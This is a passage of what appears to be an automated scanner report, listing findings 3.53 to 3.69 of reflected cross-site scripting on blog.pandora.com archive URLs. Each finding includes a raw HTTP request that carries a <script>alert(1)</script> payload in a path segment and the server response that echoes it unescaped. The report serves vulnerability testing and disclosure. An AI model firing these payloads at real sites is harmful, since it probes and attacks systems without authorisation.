Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p>
...[SNIP]...

3.53. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p>
...[SNIP]...

3.54. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p>
...[SNIP]...

3.55. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p>
...[SNIP]...

3.56. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p>
...[SNIP]...

3.57. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p>
...[SNIP]...

3.58. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p>
...[SNIP]...

3.59. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p>
...[SNIP]...

3.60. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p>
...[SNIP]...

3.61. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p>
...[SNIP]...

3.62. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p>
...[SNIP]...

3.63. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p>
...[SNIP]...

3.64. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p>
...[SNIP]...

3.65. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p>
...[SNIP]...

3.66. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p>
...[SNIP]...

3.67. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p>
...[SNIP]...

3.68. http://blog.pandora.com/pandora/archives/2006/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p>
...[SNIP]...

3.69. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
